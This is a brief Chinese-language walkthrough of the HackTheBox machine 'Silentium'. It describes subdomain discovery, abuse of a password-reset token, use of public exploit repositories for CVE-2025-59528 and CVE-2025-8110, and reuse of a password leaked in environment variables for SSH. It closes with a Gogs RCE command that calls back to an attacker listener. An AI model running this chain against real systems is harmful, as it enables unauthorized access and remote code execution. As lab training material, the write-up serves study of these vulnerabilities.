渗透测试HTB Season10 Silentium全过程wp如何详细记录?

摘要:Silentium 信息收集 扫一下子域名 扫到staging.silentium.htb 我们抓个包试试 {"email":"ben@silentium.htb
Silentium 信息收集 扫一下子域名 扫到staging.silentium.htb 我们抓个包试试 {"email":"ben@silentium.htb","password":"1"} 从报错信息看出,也就是说用户的邮箱是ben@silentium.htb 去抓一个忘记密码的包 可以得到teamToken 这里密码随便设置Password123! 然后进行登录即可 漏洞利用(CVE-2025-59528) git clone https://github.com/AzureADTrent/CVE-2025-58434-59528.git 可以看到自己是在docker容器里 我们看一下env有没有什么泄露的 有个密码是r04D!!_R4ge我们ssh一下 ssh ben@10.129.197.47 r04D!!_R4ge 提权 看一下监听的端口 有服务开启了3001端口 代理出来 ssh -L 3001:127.0.0.1:3001 ben@10.129.197.47 我们注册一个看看 漏洞利用(CVE-2025-8110) CVE-2025-8110 Gogs远程命令注入漏洞绕过分析与复现-先知社区 git clone https://github.com/Ghxstsec/CVE-2025-8110.git 其中脚本要改一下username 和 token python3 CVE-2025-8110-RCE.py -u http://127.0.0.1:3001 -lh 10.10.16.17 -lp 6666 -p 'chenzi123'